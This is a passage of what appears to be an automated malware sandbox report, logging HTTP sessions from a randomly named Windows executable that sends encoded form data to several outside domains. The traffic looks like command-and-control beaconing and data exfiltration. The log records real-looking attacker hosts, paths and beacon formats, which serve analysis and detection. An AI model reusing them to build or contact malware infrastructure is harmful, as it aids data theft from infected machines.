                                                      28           192.168.2.6   49757         91.195.240.19    80                 6800   C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp                             Bytes transferred   Direction   Data
                                                      Jul 3, 2024 17:58:20.681797028 CEST   349                 OUT         GET /3jr0/?OdjTHtuX=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Y6vp=3PLd8j HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.easybackpage.net
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:58:21.382949114 CEST   1236                IN          HTTP/1.1 200 OK
                                                      date: Wed, 03 Jul 2024 15:58:21 GMT
                                                      content-type: text/html; charset=UTF-8
                                                      transfer-encoding: chunked
                                                      vary: Accept-Encoding
                                                      expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                      cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      pragma: no-cache
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_rRjJIWQ2eGKqDJ4VFZEGEqIfhEaBn/P9OrURBY8NQjXfYaXIJQfAAF0i/V+hMwvpLYKngQamCJviQX0o42IS+A==
                                                      last-modified: Wed, 03 Jul 2024 15:58:21 GMT
                                                      x-cache-miss-from: parking-89c5695ff-gj6gm
                                                      server: Parking/1.0
                                                      connection: close
                                                      Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_rRjJIWQ2eGKqDJ4VFZEGEqIfhEaBn/P9OrURBY8NQjXfYaXIJQfAAF0i/V+hMwvpLYKngQamCJviQX0o42IS+A==><head><meta charset="utf-8"><title>easybackpage.net&nbsp;-&nbsp;easybackpage Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="easybackpage.net is your first and best source for all of the informa


                                                      Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
                                                      29           192.168.2.6   49758         144.208.124.10   80                 6800   C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp                             Bytes transferred   Direction   Data
                                                      Jul 3, 2024 17:58:27.202419996 CEST   632                 OUT         POST /mwa4/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.superunicornpalace.com
                                                      Origin: http://www.superunicornpalace.com
                                                      Referer: http://www.superunicornpalace.com/mwa4/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=MIFIKpnnryZQ+4pxg0jPOd7mrruydKfb6VV0ta6TCp/46tQs9LvK6D+53bhib7cG2slKq7DDWrpAjCqe0YThDaCuXyEeC/+eWLD7o8j3WNgl6JqA94w+dDIS0zKGIF8774R5HdCeKmJcEAKYxlAi4SdlOBXmbHBtCUYqEmf2BxyMXdHkg1/QObv/TXzq2pfZ42FgEorg933k
                                                      Jul 3, 2024 17:58:27.790493965 CEST   1236                IN          HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                      content-type: text/html; charset=UTF-8
                                                      link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
                                                      x-tec-api-version: v1
                                                      x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
                                                      x-tec-api-origin: https://superunicornpalace.com
                                                      transfer-encoding: chunked
                                                      content-encoding: gzip
                                                      vary: Accept-Encoding
                                                      date: Wed, 03 Jul 2024 15:58:27 GMT
                                                      server: LiteSpeed


                                                      Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
                                                      30           192.168.2.6   49759         144.208.124.10   80                 6800   C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp                             Bytes transferred   Direction   Data
                                                      Jul 3, 2024 17:58:30.041765928 CEST   656                 OUT         POST /mwa4/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.superunicornpalace.com
                                                      Origin: http://www.superunicornpalace.com
                                                      Referer: http://www.superunicornpalace.com/mwa4/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=MIFIKpnnryZQ4o5xmXLPf97noruyXqec6VJ0tfa9Dcv40v4sv6vK2j+5jLhjErcz2tY9q7/DWr9AjDae0PPgCKCobSEcdv+eWLD7o8HRWNol54aA9aI/QjIRkTKGfV8n74RHHcegKkBcEB6Yx0AtvCcPKBX5NCs4H1J7LUDlXDyKbLG+8G/zcLP9TVrY2Jfz629gW/nHyDSHw0EsriSmgzzUMt44Y4nxKQ==
                                                      Jul 3, 2024 17:58:30.652384043 CEST   1236                IN          HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                      content-type: text/html; charset=UTF-8
                                                      link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
                                                      x-tec-api-version: v1
                                                      x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
                                                      x-tec-api-origin: https://superunicornpalace.com
                                                      transfer-encoding: chunked
                                                      content-encoding: gzip
                                                      vary: Accept-Encoding
                                                      date: Wed, 03 Jul 2024 15:58:30 GMT
                                                      server: LiteSpeed


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      31 | 192.168.2.6 | 49760 | 144.208.124.10 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:58:32.778522968 CEST | 1669 | OUT | POST /mwa4/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.superunicornpalace.com
                                                      Origin: http://www.superunicornpalace.com
                                                      Referer: http://www.superunicornpalace.com/mwa4/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:58:33.498534918 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                      content-type: text/html; charset=UTF-8
                                                      link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
                                                      x-tec-api-version: v1
                                                      x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
                                                      x-tec-api-origin: https://superunicornpalace.com
                                                      transfer-encoding: chunked
                                                      content-encoding: gzip
                                                      vary: Accept-Encoding
                                                      date: Wed, 03 Jul 2024 15:58:33 GMT
                                                      server: LiteSpeed


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      32 | 192.168.2.6 | 49761 | 144.208.124.10 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:58:36.297931910 CEST | 355 | OUT | GET /mwa4/?Y6vp=3PLd8j&OdjTHtuX=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs= HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.superunicornpalace.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:58:36.852780104 CEST | 492 | IN | HTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                      content-type: text/html; charset=UTF-8
                                                      x-redirect-by: WordPress
                                                      location: http://superunicornpalace.com/mwa4/?Y6vp=3PLd8j&OdjTHtuX=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs=
                                                      content-length: 0
                                                      date: Wed, 03 Jul 2024 15:58:36 GMT
                                                      server: LiteSpeed


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      33 | 192.168.2.6 | 49762 | 162.43.101.114 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:58:42.887034893 CEST | 599 | OUT | POST /rxdf/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.tedjp-x.com
                                                      Origin: http://www.tedjp-x.com
                                                      Referer: http://www.tedjp-x.com/rxdf/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:58:43.897125006 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 16:00:23 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                      ETag: W/"afe-6098b1f8c138d"
                                                      Content-Encoding: gzip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      34 | 192.168.2.6 | 49763 | 162.43.101.114 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:58:45.426419973 CEST | 623 | OUT | POST /rxdf/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.tedjp-x.com
                                                      Origin: http://www.tedjp-x.com
                                                      Referer: http://www.tedjp-x.com/rxdf/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:58:46.255147934 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 16:00:26 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                      ETag: W/"afe-6098b1f8c138d"
                                                      Content-Encoding: gzip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      35 | 192.168.2.6 | 49764 | 162.43.101.114 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:58:48.033787012 CEST | 1636 | OUT | POST /rxdf/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.tedjp-x.com
                                                      Origin: http://www.tedjp-x.com
                                                      Referer: http://www.tedjp-x.com/rxdf/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:58:48.802875996 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 16:00:28 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                      ETag: W/"afe-6098b1f8c138d"
                                                      Content-Encoding: gzip
                                                      Jul 3, 2024 17:58:48.802895069 CEST | 353 | IN | [binary response data]


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      36 | 192.168.2.6 | 49765 | 162.43.101.114 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:58:50.671372890 CEST | 344 | OUT | GET /rxdf/?OdjTHtuX=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Y6vp=3PLd8j HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.tedjp-x.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:58:51.491303921 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 03 Jul 2024 16:00:31 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 2814
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
                                                      ETag: "afe-6098b1f8c138d"
                                                      Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px;
                                                      Jul 3, 2024 17:58:51.491368055 CEST | 1236 | IN | Data Ascii: margin: 0; padding: 0; color: white;}.explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li {
                                                      Jul 3, 2024 17:58:51.491379976 CEST | 582 | IN | Data Ascii: div id="base"> <h1><span>404</span><br /> File Not Found</h1> <h2></h2> <p class="explain"></p> <h3>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      37 | 192.168.2.6 | 49766 | 45.113.122.18 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:58:56.913892984 CEST | 617 | OUT | POST /n8zi/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.3cubesinterior.in
                                                      Origin: http://www.3cubesinterior.in
                                                      Referer: http://www.3cubesinterior.in/n8zi/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=eBlW0Mgs/H1+P6DAwYN2Xdl3AZXPS5JbL+hA6ZGuYWXVqNXRAYKD6B9QpEztBNQgG/NzAiQqQxwYKwBRp9E3wjko4BnFRWIfnTuvDO8Y8y2ZUYC7nhYFZVGwRLQqGd7JGcG5OvIXBzVREjI2Yq85ctmjswsLx9QEsy+ZyhGY9OYwJbuObr86HSL67Xum1KoG+B2eKIsGkxo4


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      38 | 192.168.2.6 | 49767 | 45.113.122.18 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:58:59.967823982 CEST | 641 | OUT | POST /n8zi/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.3cubesinterior.in
                                                      Origin: http://www.3cubesinterior.in
                                                      Referer: http://www.3cubesinterior.in/n8zi/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=eBlW0Mgs/H1+PaTAy7l2AtloFZXPbZJfL+tA6Yz2ZkjVqsnRBceDvB9Q7kzkPtQ+G4F7AjsqQxMYK0FRpOs2qTlOjRnLVWIfnTuvDOoy8y+ZULK7nFEKaVG3G7QqCd7NGcHWOrQ9B1JREms2Jb86F9mlowtF8ft2pSz86Qu4m/c2MtvUHY8ZVCr47V2U1qos8BOeYfghrFNblCeZ5a1o2AewW+lHNkFePA==


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      39 | 192.168.2.6 | 49769 | 45.113.122.18 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:59:02.519221067 CEST | 1654 | OUT | POST /n8zi/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.3cubesinterior.in
                                                      Origin: http://www.3cubesinterior.in
                                                      Referer: http://www.3cubesinterior.in/n8zi/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      40 | 192.168.2.6 | 49770 | 45.113.122.18 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:59:05.078006029 CEST | 350 | OUT | GET /n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw= HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.3cubesinterior.in
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:59:06.416336060 CEST | 514 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 03 Jul 2024 15:59:06 GMT
                                                      Server: nginx/1.23.4
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 0
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      X-Redirect-By: WordPress
                                                      Location: http://3cubesinterior.in/n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw=
                                                      X-Server-Cache: true
                                                      X-Proxy-Cache: MISS


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      41 | 192.168.2.6 | 49771 | 142.250.74.211 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:59:16.653633118 CEST | 626 | OUT | POST /s0j2/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.artvectorcraft.store
                                                      Origin: http://www.artvectorcraft.store
                                                      Referer: http://www.artvectorcraft.store/s0j2/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=Mepd0knFZBCM4CeS0gg2KYsuiT32vFzOrfiiqStUV35WtoYuJg027MHJqZDAcbzg6TttsmSgncS3vxlA3Vq7mw3z1NV6wo8A/cl5UQQXaytmoHOt7AfQ+B18Cn9cq/NKiY7brVs70XnVxI6K7W0WJqE5JSFvjIaoQNgRf8l2ticTZgpNbcTHX+rosU41FcfkindgJwYJRJ1W
                                                      Jul 3, 2024 17:59:17.305421114 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:59:17 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Server: ghs
                                                      Content-Length: 1566
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      Connection: close
                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                      Jul 3, 2024 17:59:17.305635929 CEST | 537 | IN | Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      42 | 192.168.2.6 | 49772 | 142.250.74.211 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:59:19.197988987 CEST | 650 | OUT | POST /s0j2/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.artvectorcraft.store
                                                      Origin: http://www.artvectorcraft.store
                                                      Referer: http://www.artvectorcraft.store/s0j2/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: OdjTHtuX=Mepd0knFZBCMqyOS4nM2N4shnT32klzKrfmiqXUJVFNWuMUuKiM26MHJi5DFS7zr6TxTsnugna+3vz9A0ie8mg3L5tVk/I8A/cl5UU54ay1mo3etp1jTgR1/Bn9chfNWiY75rRsC0VvVxNeK1n0XAqE/HyFhrbDSYdwcGvxK9Al0R2oXHvTkFuLqsWgHF8fOgnlgbnUue9Q1i7OY5wKAZQxoJLtt2uEq8A==
                                                      Jul 3, 2024 17:59:19.885412931 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:59:19 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Server: ghs
                                                      Content-Length: 1566
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      Connection: close
                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                      Jul 3, 2024 17:59:19.885433912 CEST | 537 | IN | Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      43 | 192.168.2.6 | 49773 | 142.250.74.211 | 80 | 6800 | C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
